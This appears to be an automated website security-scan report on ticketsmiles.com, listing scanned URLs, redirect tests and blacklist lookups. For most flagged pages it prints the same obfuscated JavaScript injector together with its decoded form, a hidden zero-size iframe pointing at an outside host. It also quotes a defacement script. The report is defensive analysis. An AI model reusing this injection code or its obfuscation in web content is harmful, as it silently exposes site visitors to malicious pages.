Scanned pages/files
Request | Server response | Status |
http://ticketsmiles.com/ | 200 OK Content-Length: 28708 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
Deface/Content modification. The following signature was found: You got Hacked By 0p7!mu$ $p@rroW <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <script language="JavaScript"> function tb5_makeArray(n){ this.length = n; return this.length; } tb5_messages = new tb5_makeArray(5); tb5_messages[0] = "You got Hacked By 0p7!mu$ $p@rroW"; tb5_messages[1] = "We are Bangladeshi Hacker"; tb5_messages[2] = "We love Bangladesh, We Love Hacking!"; tb5_messages[3] = "We Can Do Everything"; tb5_messages[4] = "For Our Country !"; tb5_messages[5] = "Don't worry! your all data base is safe!"; tb5_messages[6] = "We just Inform your site's security is too low"; tb5_messages[7] = "Fixed it as soon posible, else others hacker hacked y ...[31803 bytes skipped]... | ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/cloudflare.js | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20 <span>...69 symbols skipped</span> | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20 <span>...105 symbols skipped</span> | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
| ||
http://ticketsmiles.com/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20bY%20Death%7D_files/%7BCoNtrollEd%20 <span>...141 symbols skipped</span> | 200 OK Content-Length: 28708 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://resourcegenerator.info/vacfm.cgi?default" frameborder="0" style="width:0; height:0"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ticketsmiles.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 20 Feb 2015 06:55:06 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: ticketsmiles.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 20 Feb 2015 06:55:06 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: ticketsmiles.com
Referer: http://www.google.com/search?q=ticketsmiles.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ticketsmiles.com
Referer: http://www.google.com/search?q=ticketsmiles.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ticketsmiles.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ticketsmiles.com/
Result: ticketsmiles.com is not infected or malware details are not published yet.
Result: ticketsmiles.com is not infected or malware details are not published yet.